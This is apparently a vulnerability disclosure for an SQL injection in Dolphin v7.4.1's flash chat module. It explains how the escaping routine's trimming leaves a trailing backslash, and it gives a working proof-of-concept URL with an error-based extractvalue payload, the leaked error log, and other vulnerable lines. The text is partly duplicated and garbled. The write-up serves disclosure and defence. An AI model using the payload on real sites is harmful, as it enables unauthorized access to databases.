if(**$bBlock**) {
getResult("REPLACE INTO `sys_block_list` SET `ID` = '" . $iUserId . "', `Profile` = '" . $iBlockedId . "'");
$oZ = new BxDolAlerts('block', 'add', $iBlockedId, $iUserId);
} else {
getResult("DELETE FROM `sys_block_list` WHERE `ID` = '" . $iUserId . "' AND `Profile` = '" . $iBlockedId . "'");
$oZ = new BxDolAlerts('block', 'delete', $iBlockedId, $iUserId);
}
$oZ->alert();
} When $bBlock is true, the function getResult() is called, SQL string is "REPLACE INTOsys_block_listSETID= '$iUserId ',Profile` = '$iBlockedId'"
So...
when Submit via browser "id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23"
blocked=true id=admin%27 --> process_db_input() --> admin\ user=%2bextractvalue(1,concat(0x7e,user()))%23 --> +extractvalue(1,concat(0x7e,user()))#
Then Parameters passed to function blockUser(), SQL string is:
REPLACE INTOsys_block_listSETID= 'admin\',Profile= '+extractvalue(1,concat(0x7e,user()))#'
Q^Q... SQL injection is back.
In this way, as long as the two parameters are spliced, SQL injection vulnerabilities may occur.
Other similar scenes:
/flash/modules/chat/inc/actions.inc.php Line 137 /flash/modules/chat/inc/actions.inc.php Line 156 /flash/modules/chat/inc/actions.inc.php Line 180 /flash/modules/chat/inc/actions.inc.php Line 198 /flash/modules/chat/inc/actions.inc.php Line 210
version: Dolphin-v.7.4.1 POC: http://localhost/flash/XML.php?module=chat&app=1&action=RzSetBlocked&id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23&blocked=true After submitting, view the tmp/error.log file ` --- 2019-04-15T09:25:16+00:00 Type: PDOException Message: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~root@DESKTOP-9ELD8JS' File: E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php Line: 169 Trace:
0 E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php(169): PDO->query('REPLACE INTO `s...')
1 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(17): BxDolDb->res('REPLACE INTO `s...')
2 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(51): BxDbConnect->getResult('REPLACE INTO `s...')
3 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\customFunctions.inc.php(70): getResult('REPLACE INTO `s...')
4 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\actions.inc.php(123): blockUser('admin\', ',
Profile
=extr...', true)5 E:\TODO\Dolphin-v.7.4.1\flash\XML.php(52): require_once('E:\TODO\Dolphin...')
6 {main}
`
details: Step 1: /flash/modules/chat/inc/actions.inc.php Line 120
Line 10 $sId = isset($_REQUEST['id']) ? process_db_input($_REQUEST['id']) : ""; ...... Line 120 case 'RzSetBlocked': $sUser = isset($_REQUEST['user']) ? **process_db_input**($_REQUEST['user']) : ""; $bBlocked = isset($_REQUEST['blocked']) ? $_REQUEST['blocked'] == TRUE_VAL : false; blockUser($sId, $sUser, $bBlocked); break;
Step 2: Track to process_db_input()function process_db_input($sText, $iStripTags = 0) { ...... return $sText; } ...... switch ($iStripTags) { case BX_TAGS_STRIP_AND_NL2BR: return $oDb->escape(nl2br(strip_tags($sText)), false); ...... case BX_TAGS_NO_ACTION: default: return $oDb->**escape**($sText, false); }
Then ,Track to escape() `public function escape($sText, $bReal = true) { $pdoEscapted = $this->link->quote($sText);The function quote() will add escaping to the character. such as : admin' --> 'admin\''
The function trim() removes the characters at the beginning and end of the string. such as: 'admin\'' --> admin\
Step 3: Track to blockUser(): `function blockUser($iUserId, $iBlockedId, $bBlock) { bx_import('BxDolAlerts');
}
When $bBlock is true, the function getResult() is called, SQL string is "REPLACE INTO
sys_block_listSET
ID= '$iUserId ',
Profile` = '$iBlockedId'"So... when Submit via browser "id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23"
blocked=true id=admin%27 --> process_db_input() --> admin\ user=%2bextractvalue(1,concat(0x7e,user()))%23 --> +extractvalue(1,concat(0x7e,user()))#
Then Parameters passed to function blockUser(), SQL string is:REPLACE INTO
sys_block_listSET
ID= 'admin\',
Profile= '+extractvalue(1,concat(0x7e,user()))#'
Q^Q... SQL injection is back. In this way, as long as the two parameters are spliced, SQL injection vulnerabilities may occur.Other similar scenes:
/flash/modules/chat/inc/actions.inc.php Line 137 /flash/modules/chat/inc/actions.inc.php Line 156 /flash/modules/chat/inc/actions.inc.php Line 180 /flash/modules/chat/inc/actions.inc.php Line 198 /flash/modules/chat/inc/actions.inc.php Line 210